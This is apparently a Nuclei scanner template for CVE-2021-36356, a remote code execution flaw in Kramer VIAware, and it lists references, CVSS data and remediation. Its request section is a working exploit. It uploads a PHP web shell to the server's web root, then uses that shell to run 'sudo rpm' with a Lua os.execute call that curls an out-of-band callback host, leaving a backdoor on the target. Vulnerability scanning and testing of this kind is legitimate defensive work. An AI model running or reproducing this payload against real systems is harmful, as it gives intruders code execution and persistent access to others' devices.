id: CVE-2021-36356 info: name: Kramer VIAware - Remote Code Execution author: gy741 severity: critical description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames. remediation: | Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web interface. reference: - https://www.exploit-db.com/exploits/50856 - https://nvd.nist.gov/vuln/detail/CVE-2021-36356 - https://nvd.nist.gov/vuln/detail/CVE-2021-35064 - https://write-up.github.io/kramerav/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-36356 cwe-id: CWE-434 epss-score: 0.88363 epss-percentile: 0.9839 cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: kramerav product: viaware tags: viaware,cve,cve2021,kramer,edb,rce,intrusive variables: useragent: "{{rand_base(6)}}" http: - raw: - | POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php - | GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'")}' HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - http - type: word part: interactsh_request words: - "User-Agent: {{useragent}}" # digest: 4a0a00473045022038f33dbb8c0e4e04f81a15960ffcabd69af2843f7f1a1e19609931f3ca3e0541022100c8117ef56cbb512b2c048b44d2ff596af4af06cb9d8e325d011eb6bd7ab2013b:922c64590222798bb761d5b6d8e72950